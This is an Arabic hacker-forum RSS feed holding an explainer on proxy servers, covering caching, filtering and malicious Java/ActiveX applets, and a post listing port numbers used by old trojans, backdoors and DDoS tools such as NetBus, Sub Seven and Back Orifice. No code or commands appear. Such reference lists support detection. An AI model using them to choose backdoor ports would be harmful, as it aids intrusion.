من أن لغة جافا تحتوي على آليات حماية أمنية، فليس هناك ضمان من عدم قيام بعض

البريمجات بأعمال تخريبية على جهازك، كمسح الملفات من قرصك الصلب مثلاً.

وتتضح أهمية تنقية صفحات ويب من أي بريمجات مشبوهة، بعدما نجح أحد المبرمجين

في تضمين بريمج يستخدم تقنية ActiveX ضمن صفحة ويب، حيث يقوم هذا البرنامج

بإغلاق ويندوز95 عندما يطلب برنامج التصفح تلك الصفحة، ولكن بدون أن يسبب أي

أذى آخر. وأدوات ActiveX عبارة عن بريمجات تعمل في ظل ويندوز، ويمكن

توزيعها مع صفحات ويب، ويمكن لهذه البريمجات أن تفعل أي شيء تفعله برامج

ويندوز الأخرى. أي يمكنك كتابة أداة ActiveX لإعادة تهيئة القرص الصلب، مثلاً

عندما يحاول المتصفح عرض صفحة ويب التي تتضمن هذا البريمج. ويمكن تضمين

الفيروسات في بريمجات ActiveX وتوزيعها عبر صفحات ويب. كما يمكن لهذه

البريمجات أن تبحث ضمن قرصك الصلب عن معلوماتك المالية أو أي معلومات خاصة

أخرى، وترسلها بالبريد الإلكتروني إلى جهة ما. ويمكن تنفيذ كل هذه الأعمال من خلال

بريمجات بريئة المظهر، تتخفى، مثلاً، وراء لعبة، أو صفحة معلومات عن السياحة والسفر.

أهم شيء في عملك، هو الطريقة التي تعلن فيها عنه !

يخاف الكثيرون من كلمة "التغيير" في عالم تكنولوجيا المعلومات، عندما ترد بسياق

اعتماد تقنيات مختلفة، ولكنهم يرحبون بها إذا جاءت بسياق "التطوير". وكثيراً ما

يسمع مدير قسم الكمبيوتر في أي مؤسسة، الجمل التالية من موظفي

المؤسسة: "أرجو منك ترقية جهازي، أريده أسرع بثلاث مرات عما هو عليه الآن

وبرنامجاً للجداول الممتدة يدعم تقنية جافا، وإضافة قوالب لصاقات بريدية متنوعة إلى

برنامج معالج الكلمات. كما أريد خط ISDN، وإمكانية الاتصال بكافة الطابعات

الموجودة في شبكتنا المحلية. ولكن أرجو ألا تغير شيئاً في برامجي وملفاتي الحالية" !

تبدو هذه الطلبات متناقضة وغير منطقية، ولكنها ليست بعيدة المنال أيضاً.

إن أي تغيير يأخذ الكثير من الوقت، وخصوصاً الوقت الذي يجب أن يصرفه المستخدم

للتمكن من البرامج والتجهيزات الجديدة وغالباً لا يكون لدى المستخدم أي وقت إضافي

لتخصيصه لهذه الأمور، ولذلك يفضِل أن يستمر في العمل على البرامج التي اعتاد

عليها. ولا يعني هذا عدم ضرورة التغيير، فالتطورات السريعة في تكنولوجيا

المعلومات، تجعل تطوير نظم الكمبيوتر أمراً لا مفر منه. فكيف يستطيع مدير قسم

الكمبيوتر إجراء التغييرات الضرورية بسلاسة وبدون أن يؤثر سلباً على إنتاجية

المستخدمين؟


يمكنه ذلك بسهولة، فعليه أن يخبرهم عن الجوانب الإيجابية فقط في عمليات التغيير

وأن يتجاهل أو يخفف من الآثار الجانبية لها، ولعله إذا لم يذكر كلمة "تغيير"، فلن

يلاحظ أحد ذلك. وليس من المهم أن يفهم المستخدمون طبيعة التغييرات التي يريد مدير

قسم الكمبيوتر إجراءها، بل الطريقة التي يقدم بها هذه التغييرات لهم، فإذا قدّمها بشكل

صحيح، لن يمانع المستخدمون، حتى لو كانت تلك التغييرات جذرية.

ولم نستغرب الفتور والرفض الذي قوبل به مزوّد البروكسي، من جمهور مشتركي

إنترنت إذ جاء الطرح وسط عاصفة من التذمر الإعلامي العالمي حول فرض الرقابة

على إنترنت، وأن مزوّد البروكسي سيحد من الحرية الشخصية ومتعة الإبحار في عباب

الشبكة العالمية. وصاح أحد المستخدمين: "صارت الشبكة بطيئة"، وهزّ زملاؤه

رؤوسهم علامة الموافقة، لعدم وجود أي معلومات لديهم عن تقنية البروكسي. والحقيقة أن مزوّد البروكسي لا يبطئ العمل، فمهمته الأولى والأساسية تسريع الاتصال

بإنترنت، بالإضافة إلى وظائف أخرى مفيدة. صحيح أن البروكسي يمنع الوصول إلى

بعض المواقع، ولكن هذا الدور الرقابي هام، ويجب أن تقوم به السلطات المعنية. ولكن

الإعلام، للأسف، سلّط الضوء على موضوع الرقابة فقط، متجاهلاً كافة الفوائد الأخرى

لمزوّدات البروكسي. وكم كان الوضع أفضل لو تم تناول الموضوع بطريقة إيجابية

بناءة، عبر شرح آلية عمل البروكسي وفوائده، بدلاً من التركيز على الرقابة والقيود

التي يفرضها.

أرجو الإستفادة منه إن شاء الله .]]></description>
			<content:encoded><![CDATA[<div>كل ماتود معرفته عن البروكسي Proxy<br />
<br />
الكاتب: هيثم الشرقاوي<br />
<br />
 <br />
<br />
<br />
<br />
السلام عليكم ورحمة الله وبركاته<br />
<br />
هذه بعض المعلومات عن مزودات البروكسى ارجو ان تستفيدوا منها<br />
<br />
البروكسي<br />
<br />
محاسنها ومساؤها<br />
<br />
مزوّدات البروكسي مستخدمة عالمياً، وعلى نطاق واسع، لتسريع التعامل مع إنترنت<br />
<br />
ولأداء بعض الوظائف الأمنية الهامة. وسنحاول إماطة اللثام عن خفايا مزوّدات<br />
<br />
البروكسي من خلال الإجابة على مجموعة من الأسئلة التي تكرر طرحها علينا.<br />
<br />
ما هي مزودات البروكسي، وكيف تسرّع التعامل مع إنترنت؟<br />
<br />
proxy كلمة إنجليزية، تعني الوكيل.<br />
<br />
وتقوم مزوّدات بروكسي بدور الوسيط بين المشتركين لدى إحدى شركات تقديم خدمة<br />
<br />
إنترنت، وبين المواقع الموجودة على الشبكة العالمية، أو بدور الوكيل عن هؤلاء<br />
<br />
المشتركين في طلب المعلومات من تلك المواقع. ونستطيع أن نتخيل مزوّدات<br />
<br />
البروكسي كذاكرات كاش كبيرة الحجم، مهمتها تسريع الحصول على المعلومات من<br />
<br />
مواقع ويب، وأداء بعض الوظائف الأخرى المفيدة.<br />
<br />
إذا أردت مشاهدة صفحة ويب ، فإن برنامج التصفح لديك، سينشئ اتصالاً بينه وبين<br />
<br />
موقعنا، ويطلب قراءة وثيقة HTML وينقلها إلى جهازك. ولنفترض أن شخصاً آخر<br />
<br />
أراد زيارة موقعنا أيضاً، في ذات الوقت، أو بعد 10 دقائق مثلاً، فإن العمليات السابقة<br />
<br />
ستتكرر مرة أخرى، وهذا ما يؤدي إلى إشغال خطوط المزود الذي تتصل عبره بشبكة<br />
<br />
إنترنت لطلب المعلومات ذاتها، في نفس الوقت، أو خلال فترات زمنية متقاربة،<br />
<br />
خصوصاً عندما يتعلق الأمر بزيارة مواقع شهيرة، يكثر ارتيادها.<br />
<br />
أما إذا جهّزت برنامج التصفح لديك لاستخدام مزوّد بروكسي، فإنه سيتصل بهذا المزوّد<br />
<br />
وهو proxy الخاص بمزودك، ويطلب منه إحضار الصفحة المطلوبة. وهنا يبحث<br />
<br />
مزوّد البروكسي عن الصفحة المطلوبة، في قاعدة بياناته (أي ذاكرة الكاش)<br />
<br />
ليرى إن كان هناك نسخة حديثة منها. إذا وجد البروكسي الصفحة ضمن قاعدة بياناته<br />
<br />
فإنه يرسلها إليك مباشرة. أما إن لم تكن موجودة لديه، فإنه سيطلبها من موقع ويب<br />
<br />
ويرسلها إليك، ويخزّن نسخة منها في قاعدة بياناته، في الوقت ذاته.<br />
<br />
وعندما يطلب مشترك آخر يستخدم البروكسي ذاته، نفس الصفحة فإن البروكسي<br />
<br />
سيرسلها إليه من قاعدة بياناته مباشرة، وبسرعة كبيرة، بدون الحاجة لإعادة جلبها من<br />
<br />
موقعها الأصلي.<br />
<br />
وتأتي السرعة نتيجة لحقيقة أخرى وهي أن البروكسي يستطيع قراءة المعلومات من<br />
<br />
مواقع ويب، بسرعة أكبر مما يستطيعه جهازك فيما لو اتصل بذلك الموقع مباشرة.<br />
<br />
وقال مدير إحدى شركات تقديم خدمة إنترنت في لبنان: &quot;بيّنت سجلاتنا في الأشهر الستة<br />
<br />
الماضية أن 60% من المواقع التي يرتادها المشتركون، يتكرر طلبها وأن مزوّد<br />
<br />
البروكسي يمكنه أن يوفر على المشتركين 50% من وقتهم، وسطياً.<br />
<br />
وعندما تستخدم البروكسي، تعود الفائدة عليك، وعلى بقية المشتركين أيضاً&quot;.<br />
<br />
ما هي الوظائف الأخرى للبروكسي؟<br />
<br />
طُورت تقنية البروكسي في البداية لاستخدامها كحواجز نارية (firewalls) لإنترنت.<br />
<br />
والحاجز الناري عبارة عن نظام أمني يفرض توليد جميع الرزم المرسلة أو الواردة إلى<br />
<br />
الشبكة الداخلية لمؤسسة ما، من خلال جهاز وحيد. وإذا أراد المستخدمون جلب وثيقة<br />
<br />
ما من شبكة إنترنت، فعليهم أن يطلبوا ذلك من مزوّد البروكسي، الذي يقوم بالمهمة<br />
<br />
ويمررها لهم من خلال الحاجز الناري.<br />
<br />
واشتهرت مزوّدات البروكسي في الآونة الأخيرة، بسبب إمكانياتها في تسريع الوصول<br />
<br />
إلى شبكة إنترنت، وتخفيض استهلاك عرض حزمة الناقل، ولأنها تؤمن تدابير أمنية<br />
<br />
جيدة للتحكم بعمليات الاتصال بإنترنت.<br />
<br />
فمن السهل، باستخدام مزوّد بروكسي تعريف<br />
<br />
الأشخاص المسموح لهم الاتصال بإنترنت، وتحديد الخدمات التي يمكنهم استخدامها<br />
<br />
(تصفّح، بريد إلكتروني، جلب ملفات، ...). ويمكن لمدير الشبكة أن يحدد أيام الأسبوع<br />
<br />
والساعات المسموحة للاتصال بإنترنت، أو أن يمنع الاتصال ببعض المواقع نهائياً.<br />
<br />
<br />
<br />
كيف يمكن للبروكسي منع الاتصال بالمواقع غير المسموحة؟<br />
<br />
عندما يطلب أحد المستخدمين وثيقة ما من البروكسي، ولا يجدها البروكسي قي قاعدة<br />
<br />
بياناته، فإنه يبحث أولاً ضمن قائمة أسماء المواقع الممنوعة، ويجلب الوثيقة إذا كان<br />
<br />
اسم الموقع المطلوب غير موجود في تلك القائمة، التي يحددها مدير البروكسي.<br />
<br />
هل يمكن تخزين أي وثيقة ويب في البروكسي؟<br />
<br />
لا، فبعض مواقع ويب ترسل صفحات متغيرة ديناميكياً، بناءً على المعلومات التي قدمها<br />
<br />
المستخدم. وهناك معايير متفق عليها (وبعض الاستثناءات منها !)، تستخدمها<br />
<br />
المزوّدات لاستثناء بعض الصفحات من عملية التخزين في الكاش، وعندما يطلب أي<br />
<br />
شخص هذه الصفحات، فيجب جلبها من موقعها الأصلي في كل مرة.<br />
<br />
ما هي مساوئ البروكسي؟<br />
<br />
يمكن من خلال البروكسي منع الوصول إلى صفحات معينة.<br />
<br />
وبالإضافة إلى هذا، فإن السلبية الرئيسية للبروكسي، هي الحصول على صفحات<br />
<br />
قديمة أو ناقصة أحياناً، من قاعدة بياناته. ويمكن الالتفاف على هذه المشكلة بإعادة<br />
<br />
تحميل الصفحة (بالنقر على زر Reload في برنامج التصفح)، ولكن هذه الطريقة لا<br />
<br />
تنجح دائماً. وتحدث المشكلة عندما ينقطع الاتصال خلال عملية جلب البروكسي لصفحة<br />
<br />
ما، أو عندما يلغي المستخدم طلبه ففي هذه الحالة يُخزّن جزء من الصفحة في قاعدة<br />
<br />
بيانات البروكسي، ولكن يعتبرها البروكسي كاملة، ويرسلها -على حالها- إلى أي<br />
<br />
مستخدم يطلبها.<br />
ويتم تنظيف قاعدة بيانات البروكسي وإعادة تنظيمها يومياً، حيث تُمسح الصفحات التي<br />
<br />
يكون الطلب عليها في حده الأدنى، مما قد يعني بقاء بعض الصفحات الناقصة في<br />
<br />
الكاش لعدة أيام. وربما لاحظ مستخدموا إنترنت في بعض الدول ظهور الرسالة<br />
<br />
transfer interrupted على شاشاتهم، كلما حاولوا زيارة موقع<br />
<br />
<a href="http://www.microsoft.com/" target="_blank">http://www.microsoft.com/</a> وهذا مثال عما يحدث عندما يخزن البروكسي<br />
<br />
صفحة ناقصة لديه. ولكن، لحسن الحظ، فإن هذه المشكلات مؤقتة، ويتم تطوير حلول لها.<br />
<br />
واستخدامات البروكسي متشعبة وواسعة، فمركز أبحاث Lewis التابع لوكالة &quot;ناسا&quot;<br />
<br />
مثلاً، وعنوانه <a href="http://lerc.nasa.gov/،" target="_blank">http://lerc.nasa.gov/،</a> يستخدم مزوّد بروكسي لحماية شبكة<br />
<br />
أجهزته من بريمجات جافا (Java Applets) المخربة، من خلال فلترة الوثائق<br />
<br />
المجلوبة من إنترنت، وإزالة وصلات جافا منها، وتمرير بقية الوثيقة إلى الشبكة<br />
<br />
الداخلية. وجافا لغة برمجة تستخدم &quot;الكائنات&quot; (OOP)، ومستقلة عن منصة العمل<br />
<br />
(العتاد ونظام التشغيل)، طورتها شركة صن. ولا تزال جافا تسير بخطوات سريعة نحو<br />
<br />
النضج والاكتمال. وتتضمن بعض صفحات ويب، وصلات إلى بريمجات جافا مثل أي أمر<br />
<br />
HTML آخر. وعندما يستلم متصفح يدعم جافا صفحة تتضمن وصلات إلى بريمجات<br />
<br />
جافا، فإنه يجلب تلك البريمجات مباشرة من إنترنت، وينفذها على جهازك. وعلى الرغم<br />
<br />
من أن لغة جافا تحتوي على آليات حماية أمنية، فليس هناك ضمان من عدم قيام بعض<br />
<br />
البريمجات بأعمال تخريبية على جهازك، كمسح الملفات من قرصك الصلب مثلاً.<br />
<br />
وتتضح أهمية تنقية صفحات ويب من أي بريمجات مشبوهة، بعدما نجح أحد المبرمجين<br />
<br />
في تضمين بريمج يستخدم تقنية ActiveX ضمن صفحة ويب، حيث يقوم هذا البرنامج<br />
<br />
بإغلاق ويندوز95 عندما يطلب برنامج التصفح تلك الصفحة، ولكن بدون أن يسبب أي<br />
<br />
أذى آخر. وأدوات ActiveX عبارة عن بريمجات تعمل في ظل ويندوز، ويمكن<br />
<br />
توزيعها مع صفحات ويب، ويمكن لهذه البريمجات أن تفعل أي شيء تفعله برامج<br />
<br />
ويندوز الأخرى. أي يمكنك كتابة أداة ActiveX لإعادة تهيئة القرص الصلب، مثلاً<br />
<br />
عندما يحاول المتصفح عرض صفحة ويب التي تتضمن هذا البريمج. ويمكن تضمين<br />
<br />
الفيروسات في بريمجات ActiveX وتوزيعها عبر صفحات ويب. كما يمكن لهذه<br />
<br />
البريمجات أن تبحث ضمن قرصك الصلب عن معلوماتك المالية أو أي معلومات خاصة<br />
<br />
أخرى، وترسلها بالبريد الإلكتروني إلى جهة ما. ويمكن تنفيذ كل هذه الأعمال من خلال<br />
<br />
بريمجات بريئة المظهر، تتخفى، مثلاً، وراء لعبة، أو صفحة معلومات عن السياحة والسفر.<br />
<br />
أهم شيء في عملك، هو الطريقة التي تعلن فيها عنه !<br />
<br />
يخاف الكثيرون من كلمة &quot;التغيير&quot; في عالم تكنولوجيا المعلومات، عندما ترد بسياق<br />
<br />
اعتماد تقنيات مختلفة، ولكنهم يرحبون بها إذا جاءت بسياق &quot;التطوير&quot;. وكثيراً ما<br />
<br />
يسمع مدير قسم الكمبيوتر في أي مؤسسة، الجمل التالية من موظفي<br />
<br />
المؤسسة: &quot;أرجو منك ترقية جهازي، أريده أسرع بثلاث مرات عما هو عليه الآن<br />
<br />
وبرنامجاً للجداول الممتدة يدعم تقنية جافا، وإضافة قوالب لصاقات بريدية متنوعة إلى<br />
<br />
برنامج معالج الكلمات. كما أريد خط ISDN، وإمكانية الاتصال بكافة الطابعات<br />
<br />
الموجودة في شبكتنا المحلية. ولكن أرجو ألا تغير شيئاً في برامجي وملفاتي الحالية&quot; !<br />
<br />
تبدو هذه الطلبات متناقضة وغير منطقية، ولكنها ليست بعيدة المنال أيضاً.<br />
<br />
إن أي تغيير يأخذ الكثير من الوقت، وخصوصاً الوقت الذي يجب أن يصرفه المستخدم<br />
<br />
للتمكن من البرامج والتجهيزات الجديدة وغالباً لا يكون لدى المستخدم أي وقت إضافي<br />
<br />
لتخصيصه لهذه الأمور، ولذلك يفضِل أن يستمر في العمل على البرامج التي اعتاد<br />
<br />
عليها. ولا يعني هذا عدم ضرورة التغيير، فالتطورات السريعة في تكنولوجيا<br />
<br />
المعلومات، تجعل تطوير نظم الكمبيوتر أمراً لا مفر منه. فكيف يستطيع مدير قسم<br />
<br />
الكمبيوتر إجراء التغييرات الضرورية بسلاسة وبدون أن يؤثر سلباً على إنتاجية<br />
<br />
المستخدمين؟<br />
<br />
<br />
يمكنه ذلك بسهولة، فعليه أن يخبرهم عن الجوانب الإيجابية فقط في عمليات التغيير<br />
<br />
وأن يتجاهل أو يخفف من الآثار الجانبية لها، ولعله إذا لم يذكر كلمة &quot;تغيير&quot;، فلن<br />
<br />
يلاحظ أحد ذلك. وليس من المهم أن يفهم المستخدمون طبيعة التغييرات التي يريد مدير<br />
<br />
قسم الكمبيوتر إجراءها، بل الطريقة التي يقدم بها هذه التغييرات لهم، فإذا قدّمها بشكل<br />
<br />
صحيح، لن يمانع المستخدمون، حتى لو كانت تلك التغييرات جذرية.<br />
<br />
ولم نستغرب الفتور والرفض الذي قوبل به مزوّد البروكسي، من جمهور مشتركي<br />
<br />
إنترنت إذ جاء الطرح وسط عاصفة من التذمر الإعلامي العالمي حول فرض الرقابة<br />
<br />
على إنترنت، وأن مزوّد البروكسي سيحد من الحرية الشخصية ومتعة الإبحار في عباب<br />
<br />
الشبكة العالمية. وصاح أحد المستخدمين: &quot;صارت الشبكة بطيئة&quot;، وهزّ زملاؤه<br />
<br />
رؤوسهم علامة الموافقة، لعدم وجود أي معلومات لديهم عن تقنية البروكسي. والحقيقة أن مزوّد البروكسي لا يبطئ العمل، فمهمته الأولى والأساسية تسريع الاتصال<br />
<br />
بإنترنت، بالإضافة إلى وظائف أخرى مفيدة. صحيح أن البروكسي يمنع الوصول إلى<br />
<br />
بعض المواقع، ولكن هذا الدور الرقابي هام، ويجب أن تقوم به السلطات المعنية. ولكن<br />
<br />
الإعلام، للأسف، سلّط الضوء على موضوع الرقابة فقط، متجاهلاً كافة الفوائد الأخرى<br />
<br />
لمزوّدات البروكسي. وكم كان الوضع أفضل لو تم تناول الموضوع بطريقة إيجابية<br />
<br />
بناءة، عبر شرح آلية عمل البروكسي وفوائده، بدلاً من التركيز على الرقابة والقيود<br />
<br />
التي يفرضها.<br />
<br />
أرجو الإستفادة منه إن شاء الله .</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29347</guid>
		</item>
		<item>
			<title>بورتات جميع برامج الهكرز</title>
			<link>https://kwety.net/vb/showthread.php?t=29266&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 14:00:09 GMT</pubDate>
			<description><![CDATA[بورتات جميع برامج الهكرز

R09288d 
Port 27374
Enun?ul Problemei - Bogdan Sass 
"Description of Ports Scanned:
Port Potential Trojan
2 Death
20 Sennaspy FTP Server
21 Back Construction, Blade Runner, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Senna Spy FTP Server,
Traitor 21, WebEx, Wincrash
22 shaft
23 FireHacKer, Tiny Telnet Server - TTS, Truva Atl
25 Ajan, Antigen, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99,
HPteam mail, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan),
Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtrilitz, Stealth,
Tapiras, Terminator, WinPC, WinSpy
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat, Foreplay or Reduced Foreplay
48 Drat
50 Drat
59 DMSetup
79 CDK, Firehotcker
80 AckCmd, Back End, CGI Backdoor, Executor, Hooker, RIngZero
81 RemoConCubo
99 Hidden Port
110 ProMail Trojan
113 Invisible Identd Deamon, Kazimas
119 Happy99
121 Net Controller
123 Farnaz
133 Netaxi
142 Infector
146 Infector
170 A-Trojan
334 Backage
420 Breach
421 TCP Wrappers trojan
456 Hackers Paradise
513 Grlogin
514 RPC Backdoor
531 Rasmin
555 Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
605 Secret Service
666 Attack FTP, Back Construction, Cain & Abel, No



وهذي بورتات زياده , كل بورت وتحته البرنامج اللى يدخل عن طريقه :


ICMP
Click attack

8
ICMP
Ping Attack

9
UDP
Chargen
Info

19
UDP
Chargen
Info

21
TCP
FTP service, Dolly Trojan
Info

23
TCP
TELNET Service
Info

25 
TCP
SMTP, AntiGen
Info

31 
TCP
Agent 31, Hacker's Paradise

41 
TCP
Deep Throat
Info

53
TCP
DNS
Info

58 
TCP
DM Setup

79
TCP
Firehotcker

80 
TCP
Executor
Info

90 
TCP
Hidden Port 2.o

110
TCP
ProMail Trojan

113
TCP
Kazimas

119
TCP
Happy99

121 
TCP
Jammer Killah

129
TCP
Password Generator Protocol

135
TCP UDP
Netbios Remote procedure call
Info

137
TCP UDP
Netbios name (DoS attacks)
Info

138
TCP UDP
Netbios datagram 
Info

139
TCP UDP
Netbios session (DoS attacks)
Info

146
TCP 
Infector 1.3
Info

421
TCP
Tcp Wrappers

456 
TCP
Hacker's Paradise

531
TCP
Rasmin

555
TCP
Stealth Spy, Phaze 

666
TCP
Attack FTP

777
TCP
AIM Spy Application

911
TCP
Dark Shadow

999
TCP
DeepThroat

9400
TCP
InCommand

9999
TCP
The prayer 1.2 -1.3

1000
TCP
Der Spaeher

1001
TCP
Silencer, WebEx

1011 
TCP
Doly Trojan

1012 
TCP
Doly Trojan

1015
TCP
Doly Trojan

1024 
TCP
NetSpy

1025
UDP
Maverick's Matrix 1.2 - 2.0

1027
TCP
ICQ

1029
TCP
ICQ

1032
TCP
ICQ

1033
TCP
NetSpy

1042
TCP
Bla

1045
TCP
Rasmin

1080
TCP
Socks/Wingate
Info

1090
TCP
Xtreme

1170 
TCP
Voice Streaming Audio

1207
TCP
SoftWar

1234
TCP
Ultors Trojan
Info

1243
TCP
Sub Seven
Info

1245 
TCP
VooDoo Doll

1269
TCP
Maverick's Matrix

12631
TCP
WhackJob

1349
UDP
BackOrifice DLL Comm

1394
TCP
GoFriller, Backdoor G-1

1492 
TCP
FTP99CMP

1505
TCPUDP
FunkProxy 
Info

1509
TCP
Psyber Streaming server

1600
TCP
Shivka-Burka

1604
TCP UDP 
ICA Browser
Info

1807
TCP
SpySender

1981
TCP
Shockrave

1999 
TCP
BackDoor

2000
TCP
Remote Explorer

2001 
TCP
Trojan Cow

2002
TCP
TransScout

2003
TCP
TransScout

2004
TCP
TransScout

2005
TCP
TransScout

2023 
TCP
Ripper

2086
TCP
Netscape/Corba exploit

2115 
TCP
Bugs

2140 
TCP
Deep Throat

2140
UDP
Deep Throat

2155
TCP
Illusion Mailer

2283
TCP
HLV Rat5

2565 
TCP
Striker

2583 
TCP
WinCrash

2716
TCP
The Prayer 1.2 -1.3

2721
TCP
Phase Zero

2801 
TCP
Phineas Phucker

2989
UDP
Rat

3024 
TCP
WinCrash

3028
TCP
Ring Zero

3129 
TCP
Master's Paradise

3150 
TCP
Deep Throat

3150
UDP
Deep Throat

3459
TCP
Eclipse 2000

3700 
TCP
Portal of Doom

3791
TCP
Eclypse

3801
UDP
Eclypse

4100
TCP
Watchguard Firebox admin DoS Expl
Info

4092 
TCP
WinCrash

4567
TCP
File Nail

4590 
TCP
ICQ Trojan

5000 
TCP
Sokets de Trois v1.

5001
TCP
Sokets de Trois v1.

5011
TCP
Ootlt

5031
TCP
Net Metropolitan 1.0

5032
TCP
Net Metropolitan 1.04

5321
TCP
Firehotcker

5400 
TCP
Blade Runner

5401 
TCP
Blade Runner

5402 
TCP
Blade Runner

5521
TCP
Illusion Mailer

5550
TCP
Xtcp

5512
TCP
Xtcp

5555
TCP
ServeMe

5556
TCP
BO Facil

5557
TCP
BO Facil

5569 
TCP
Robo-Hack

5637
TCP 
PC Crasher

5638
TCP
PC Crasher

5714
TCP
WinCrash

5741
TCP
WinCrash

5742 
TCP
WinCrash

6000 
TCP
The Thing 1.6

6400
TCP
The Thing

6667
TCP
Sub-7 Trojan (new icq notification) 
Info

6669
TCP
Vampyre

6670 
TCP
Deep Throat
Info

6671
TCP
Deep Throat
Info 

6711
TCP
Sub Seven
Info

6712 
TCP
Sub Seven
Info

6713 
TCP
Sub Seven
Info

6723 
TCP
Mstream attack-handler
Info

6771 
TCP
Deep Throat
Info

6776
TCP
Sub Seven
Info

6838
UDP
Mstream Agent-handler
Info

6912
TCP
Sh*t Heap (not 69123)

6939 
TCP
Indoctrination

6969
TCP
Gate Crasher, Priority
Info

6970 
TCP
Gate Crasher

7000 
TCP
Remote Grab

7028
TCP
Unknown Trojan

7028
UDP
Unknown Trojan

7300
TCP
Net Monitor

7301
TCP
Net Monitor

7306 
TCP
Net Monitor

7307 
TCP
Net Monitor

7308 
TCP
Net Monitor

7597
TCP
QaZ (Remote Access Trojan)
Info

7789 
TCP
ICKiller

7983
UDP
MStream handler-agent
Info

8080
TCP
Ring Zero

8787
TCPUDP
BackOrifice 2000

8879
TCPUDP
BackOrifice 2000

9325
UDP
MStream Agent-handler
Info

9872 
TCP
Portal of Doom

9873 
TCP
Portal of Doom

9874 
TCP
Portal of Doom

9875 
TCP
Portal of Doom

9876
TCP
Cyber Attacker

9878
TCP
Trans Scout

9989 
TCP
iNi-Killer

10067
TCP
Portal of Doom
Info

10067
UDP
Portal of Doom
Info

10167
TCP
Portal of Doom
Info

10167
UDP
Portal of Doom
Info

10498
UDP
Mstream handler-agent
Info

10520
TCP
Acid Shivers

10607
TCP
Coma

10666
TCP
Ambush

11000
TCP
Senna Spy

11050 
TCP
Host Control

11223
TCP
Progenic Trojan

12076
TCP
GJamer

12223
TCP
Hack'99, KeyLogger

12345
TCP
Netbus, Ultor's Trojan

12346
TCP
Netbus
Info

12456
TCP
NetBus
Info

12361
TCP
Whack-a-Mole

12362
TCP
Whack-a-Mole

12631
TCP
Whack Job

12701
TCP
Eclypse 2000

12754
TCP
Mstream attack-handler
Info

13000
TCP
Senna Spy

13700
TCP
Kuang2 the Virus

15104
TCP
Mstream attack-handler
Info

16484
TCP
Mosucker

16959 
TCP 
SubSeven DEFCON8 2.1 Backdoor Info 
16969
TCP
Priority

17300
TCP
Kuang2 The Virus

18753
UDP
Shaft handler to Agent
Info

20000
TCP
Millennium

20001
TCP
Millennium

20034
TCP
NetBus 2 Pro
Info

20203
TCP
Logged!

20331
TCP
Bla Trojan

20432
TCP
Shaft Client to handlers
Info

20433
TCP
Shaft Agent to handlers
Info

21554
TCPUDP
GirlFriend

22222
TCP
Prosiak

23456
TCP
EvilFTP, UglyFTP

23476
TCP
Donald Dick
Info

23477
TCP
Donald Dick
Info

26274
TCP
Delta Source

26274
UDP
Delta Source]]></description>
			<content:encoded><![CDATA[<div>بورتات جميع برامج الهكرز<br />
<br />
R09288d <br />
Port 27374<br />
Enun?ul Problemei - Bogdan Sass <br />
&quot;Description of Ports Scanned:<br />
Port Potential Trojan<br />
2 Death<br />
20 Sennaspy FTP Server<br />
21 Back Construction, Blade Runner, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Senna Spy FTP Server,<br />
Traitor 21, WebEx, Wincrash<br />
22 shaft<br />
23 FireHacKer, Tiny Telnet Server - TTS, Truva Atl<br />
25 Ajan, Antigen, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99,<br />
HPteam mail, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan),<br />
Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtrilitz, Stealth,<br />
Tapiras, Terminator, WinPC, WinSpy<br />
31 Agent 31, Hackers Paradise, Masters Paradise<br />
41 Deep Throat, Foreplay or Reduced Foreplay<br />
48 Drat<br />
50 Drat<br />
59 DMSetup<br />
79 CDK, Firehotcker<br />
80 AckCmd, Back End, CGI Backdoor, Executor, Hooker, RIngZero<br />
81 RemoConCubo<br />
99 Hidden Port<br />
110 ProMail Trojan<br />
113 Invisible Identd Deamon, Kazimas<br />
119 Happy99<br />
121 Net Controller<br />
123 Farnaz<br />
133 Netaxi<br />
142 Infector<br />
146 Infector<br />
170 A-Trojan<br />
334 Backage<br />
420 Breach<br />
421 TCP Wrappers trojan<br />
456 Hackers Paradise<br />
513 Grlogin<br />
514 RPC Backdoor<br />
531 Rasmin<br />
555 Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy<br />
605 Secret Service<br />
666 Attack FTP, Back Construction, Cain &amp; Abel, No<br />
<br />
<br />
<br />
وهذي بورتات زياده , كل بورت وتحته البرنامج اللى يدخل عن طريقه :<br />
<br />
<br />
ICMP<br />
Click attack<br />
<br />
8<br />
ICMP<br />
Ping Attack<br />
<br />
9<br />
UDP<br />
Chargen<br />
Info<br />
<br />
19<br />
UDP<br />
Chargen<br />
Info<br />
<br />
21<br />
TCP<br />
FTP service, Dolly Trojan<br />
Info<br />
<br />
23<br />
TCP<br />
TELNET Service<br />
Info<br />
<br />
25 <br />
TCP<br />
SMTP, AntiGen<br />
Info<br />
<br />
31 <br />
TCP<br />
Agent 31, Hacker's Paradise<br />
<br />
41 <br />
TCP<br />
Deep Throat<br />
Info<br />
<br />
53<br />
TCP<br />
DNS<br />
Info<br />
<br />
58 <br />
TCP<br />
DM Setup<br />
<br />
79<br />
TCP<br />
Firehotcker<br />
<br />
80 <br />
TCP<br />
Executor<br />
Info<br />
<br />
90 <br />
TCP<br />
Hidden Port 2.o<br />
<br />
110<br />
TCP<br />
ProMail Trojan<br />
<br />
113<br />
TCP<br />
Kazimas<br />
<br />
119<br />
TCP<br />
Happy99<br />
<br />
121 <br />
TCP<br />
Jammer Killah<br />
<br />
129<br />
TCP<br />
Password Generator Protocol<br />
<br />
135<br />
TCP UDP<br />
Netbios Remote procedure call<br />
Info<br />
<br />
137<br />
TCP UDP<br />
Netbios name (DoS attacks)<br />
Info<br />
<br />
138<br />
TCP UDP<br />
Netbios datagram <br />
Info<br />
